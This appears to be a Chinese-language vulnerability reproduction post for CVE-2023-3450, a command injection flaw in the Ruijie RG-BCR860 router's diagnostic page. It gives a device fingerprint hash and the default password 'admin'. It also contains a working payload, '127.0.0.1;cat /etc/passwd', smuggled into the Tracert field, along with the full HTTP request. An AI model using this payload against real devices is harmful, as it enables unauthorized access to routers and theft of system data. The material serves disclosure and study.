Ruijie RG-BCR860 后台命令执行漏洞(CVE-2023-3450)

本文涉及的产品
云原生网关 MSE Higress,422元/月
容器服务 Serverless 版 ACK Serverless,317元额度 多规格
容器服务 Serverless 版 ACK Serverless,952元额度 多规格
简介: Ruijie RG-BCR860 2.5.13 版本存在操作系统命令注入漏洞,攻击者可通过该漏洞获取服务器敏感信息,导致服务器被沦陷。

声明


  请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、简介


  北京星网锐捷网络技术有限公司,行业领先的ICT基础设施及行业解决方案提供商,主营业务为网络设备、网络安全产品及云桌面解决方案的研发、设计和销售。Ruijie Networks RG-BCR860是该公司的一款商业云路由器。


二、漏洞概述


  Ruijie RG-BCR860 2.5.13 版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。


漏洞编号:CVE-2023-3450


三、影响版本


  • Ruijie RG-BCR860 2.5.13 版本


四、环境搭建


非开源产品,无法搭建。

指纹特征: icon_hash="-399311436"


五、漏洞复现


该漏洞属于后台漏洞,需要输入默认密码admin进入后台

image.png

版本为:BCOS V2.5.10

image.png

   点击最下角的 “网络诊断”,在 "Tracert检测" 的 "地址" 框中,输入127.0.0.1;cat /etc/passwd,接着点 击 "开始检测",运行输入的命令,发现在检测框中回显了执行的命令。

image.png

Burp抓取命令执行的数据包如下:


GET /cgi-bin/luci/;stok=7159************************c3/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1

Host: 127.0.0.1:6060

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36

X-Requested-With: XMLHttpRequest

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8

Cookie: sysauth=06a17629adb3bed0a6e95d9eeec0abe6

Connection: close

image.png

六、修复方式


  目前厂商已发布升级补丁以修复漏洞,该漏洞由于正常功能过滤不严格导致存在命令注入,并且需要高权限账号登录操作,建议修改登录密码为强口令,通过白名单控制访问原地址。

目录
相关文章
|
Web App开发 XML 安全
ZeroShell防火墙存在远程命令执行漏洞(CVE-2019-12725)
zeroshell防火墙存在远程命令执行漏洞,攻击者可通过特定URL链接对目标进行攻击!!!
347 1
|
1月前
|
SQL 安全 Linux
命令执行漏洞
命令执行漏洞
|
4月前
|
自然语言处理 安全 网络安全
WBCE CMS v1.5.2 远程命令执行(CVE-2022-25099)
WBCE CMS v1.5.2 远程命令执行(CVE-2022-25099)
|
4月前
|
安全 Java 网络安全
Struts 2.0.0 至 2.1.8.1 远程命令执行(CVE-2010-1870)
Struts 2.0.0 至 2.1.8.1 远程命令执行(CVE-2010-1870)
|
4月前
|
安全 关系型数据库 网络安全
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
|
安全 Linux Windows
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。
249 1
|
存储 开发框架 安全
CVE-2020-0688 exchange远程代码执行漏洞
CVE-2020-0688 exchange远程代码执行漏洞
173 0
|
存储 编解码 安全
|
移动开发 监控 安全
|
供应链 安全 IDE
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)